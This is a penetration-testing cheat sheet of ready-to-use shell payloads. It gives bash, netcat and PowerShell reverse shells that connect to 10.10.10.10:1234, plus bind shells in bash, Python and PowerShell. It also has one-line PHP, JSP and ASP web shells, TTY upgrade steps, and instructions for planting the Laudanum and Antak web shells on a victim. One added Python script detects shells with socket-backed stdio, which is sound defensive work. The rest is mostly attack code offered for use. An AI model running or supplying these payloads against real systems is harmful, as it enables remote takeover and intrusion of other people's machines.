# Reverse Shells + Bind + Web

## Listen

* Typical `netcat`
  * `-l` listen
  * `-v` verbose
  * `-n` no DNS resolution
  * `-p <port>` port

## Payloads

More at [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)

Also at [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)

Great one: <https://www.revshells.com/>

### Bash

```bash
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
```

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
```

### Powershell

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
```
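Every payload above ends up with the shell's stdin/stdout/stderr attached to a TCP socket rather than a terminal, which is exactly what a defender can look for. The following detection script is an added example (not from the original page or any listed tool): on Linux it walks `/proc/<pid>/fd/{0,1,2}` and reports processes whose standard descriptors resolve to `socket:[inode]`. The `proc_root` parameter is my own addition so the scan can be exercised against a constructed tree.

```python
import os
import re

# Link target shown by /proc/<pid>/fd/N when that descriptor is a socket.
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")

# Interactive shells a reverse shell usually wraps; other processes with
# socket-backed stdio are still reported, this set only tags the likely shells.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh"}


def socket_stdio_fds(pid_dir):
    """Return which of fds 0, 1, 2 under one /proc/<pid> directory are sockets."""
    hits = []
    for fd in (0, 1, 2):
        link = os.path.join(pid_dir, "fd", str(fd))
        try:
            target = os.readlink(link)
        except OSError:  # process gone, fd closed, or no permission
            continue
        if SOCKET_LINK.match(target):
            hits.append(fd)
    return hits


def find_socket_backed_shells(proc_root="/proc"):
    """Scan numeric entries under proc_root; list processes whose std fds are sockets.

    Each finding is {"pid": int, "comm": str, "fds": [..], "is_shell": bool}.
    """
    findings = []
    for pid in sorted(int(e) for e in os.listdir(proc_root) if e.isdigit()):
        pid_dir = os.path.join(proc_root, str(pid))
        fds = socket_stdio_fds(pid_dir)
        if not fds:
            continue
        try:
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()
        except OSError:
            comm = "?"
        findings.append({"pid": pid, "comm": comm, "fds": fds,
                         "is_shell": comm in SHELL_NAMES})
    return findings


if __name__ == "__main__":
    for hit in find_socket_backed_shells():
        tag = "SHELL" if hit["is_shell"] else "other"
        print(f"[{tag}] pid={hit['pid']} comm={hit['comm']} socket fds={hit['fds']}")
```

Socket-activated or inetd-style services legitimately run with socket stdio, so treat the non-shell findings as a baseline to tune, and the `bash`/`sh` findings as the ones to triage first.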

***

## Sanitization/Stabilization/Upgrading TTY

After connecting, the shell is often unstable and awkward to use.

```shell-session
python -c 'import pty; pty.spawn("/bin/bash")'
```

Then `CTRL + Z` to go back to the local shell

```shell-session
stty raw -echo
fg
```

Then we should have a stable shell, but it does not yet use the full screen.

On a **local** shell:

```shell-session
echo $TERM
```

```shell-session
stty size
```

On **remote** shell:

```shell-session
export TERM=<Output of above>
```

```shell-session
stty rows <first> columns <second>
```

***

## Bind Shell

### Bash

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
```

### Python

```python
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
```

### Powershell

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
```

***

## Web shell

This is also covered in [File Inclusion](/file-inclusion.md).

### PHP

```php
<?php system($_REQUEST["cmd"]); ?>
```

### JSP

```jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
```

### ASP

```aspnet
<% eval request("cmd") %>
```

Default webroots:

| Web Server | Default Webroot        |
| ---------- | ---------------------- |
| `Apache`   | /var/www/html/         |
| `Nginx`    | /usr/local/nginx/html/ |
| `IIS`      | c:\inetpub\wwwroot\\   |
| `XAMPP`    | C:\xampp\htdocs\\      |

### ASP shells

#### Laudanum, One Webshell to Rule Them All

You can get it [here](https://github.com/jbarcia/Web-Shells/tree/master/laudanum). Laudanum is built into Parrot OS and Kali by default.

The Laudanum files can be found in the `/usr/share/laudanum` directory. Most of the files within Laudanum can be copied as-is and placed wherever you need them on the victim to run. For specific files such as the shells, you must edit the file first to insert your attacking host's IP address.

```shell-session
cp /usr/share/laudanum/aspx/shell.aspx ~/demo.aspx
```

Add your IP address to the `allowedIps` variable on line `59`.

#### Antak Webshell

Antak is a web shell built in ASP.NET and included in the [Nishang project](https://github.com/samratashok/nishang). Nishang is an offensive PowerShell toolset that provides options for any portion of your pentest.

```bash
git clone https://github.com/samratashok/nishang.git
```

```bash
cp nishang/Antak-WebShell/antak.aspx ~/Upload.aspx
```

Modify the file

(Screenshot of the edited `Upload.aspx` file; image not reproduced.)

### PHP Shells

[WhiteWinterWolf](https://github.com/WhiteWinterWolf/wwwolf-php-webshell)

### Considerations when Dealing with Web Shells

When utilizing web shells, consider the following potential issues that may arise during your penetration testing process:

* Web applications sometimes automatically delete files after a pre-defined period.
* Limited interactivity with the operating system: navigating the file system, downloading and uploading files, and chaining commands together (e.g. `whoami && hostname`) may not work, which slows progress, especially when performing enumeration.
* Potential instability through a non-interactive web shell.
* Greater chance of leaving behind proof that we were successful in our attack.

{% hint style="success" %}
Also, we must document every method we attempt, what worked and what did not, and even the names of the payloads and files we tried to use. We can include a sha1sum or MD5 hash of the file name and the upload locations in our reports as proof, and provide attribution.
{% endhint %}
